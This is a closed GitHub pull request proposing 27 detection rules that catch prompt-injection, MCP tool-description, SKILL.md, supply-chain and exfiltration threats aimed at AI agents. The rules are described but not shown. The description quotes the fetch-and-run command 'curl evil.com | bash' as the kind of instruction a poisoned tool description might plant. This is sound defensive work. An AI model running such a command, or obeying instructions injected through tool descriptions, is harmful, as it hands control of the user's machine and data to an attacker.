threats: add agent-protocol.yaml (27 rules)#32
Closed
Adamthereal (eeee2345) wants to merge 1 commit intogendigitalinc:pre-releasefrom
Closed
threats: add agent-protocol.yaml (27 rules)#32Adamthereal (eeee2345) wants to merge 1 commit intogendigitalinc:pre-releasefrom
Adamthereal (eeee2345) wants to merge 1 commit intogendigitalinc:pre-releasefrom
Conversation
Closes part of gendigitalinc#30. Adds threats/agent-protocol.yaml — 27 detection rules for agent-protocol -layer threats that arrive via MCP tool descriptions and SKILL.md files, before they become OS commands. The gap these fill: Sage catches 'curl evil.com | bash' at the command layer. These rules catch the MCP tool description that *instructs the agent to run* that command, earlier in the kill chain. All 27 rules use match_on: content, compatible with the existing matcher. Zero overlap with current commands.yaml / files.yaml / credentials.yaml. Categories: - 8x prompt injection (AGT-PI-001..008) - 8x MCP-specific (AGT-MCP-001..008) - 4x SKILL.md-specific (AGT-SKL-001..004) - 3x supply chain (AGT-SUP-001..003) - 4x agent-context exfiltration (AGT-EXF-001..004) File header declares MIT per @vaclavbelak's approval in gendigitalinc#30. Rules are derived from ATR's benchmark suite — methodology at https://github.com/Agent-Threat-Rule/agent-threat-rules#evaluation If this lands cleanly I'll submit follow-ups for the remaining ATR categories (86 rules) batched by subcategory.
Author
|
Closing in favor of #33, which supersedes this PR. WhyThis PR (#32) used an What #33 does differently
Please route review to #33. Apologies for the duplicate — this was an artifact of an earlier iteration that shipped before the proper validation loop. |
This was referenced Apr 19, 2026
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Closes part of #30.
Adds
threats/agent-protocol.yaml— 27 detection rules for agent-protocol-layer threats that arrive via MCP tool descriptions and SKILL.md files, before they become OS commands.The gap these fill: Sage catches
curl evil.com | bashat the command layer. These rules catch the MCP tool description that instructs the agent to run that command, earlier in the kill chain.All 27 rules use
match_on: content, compatible with the existing matcher. Zero overlap with currentcommands.yaml/files.yaml/credentials.yaml.Categories
AGT-PI-001..008)AGT-MCP-001..008)AGT-SKL-001..004)AGT-SUP-001..003)AGT-EXF-001..004)File header declares MIT per Vaclav Belak (@vaclavbelak)'s approval in #30.
Rules are derived from ATR's benchmark suite — methodology at https://github.com/Agent-Threat-Rule/agent-threat-rules#evaluation
If this lands cleanly I'll submit follow-ups for the remaining ATR categories (86 rules) batched by subcategory.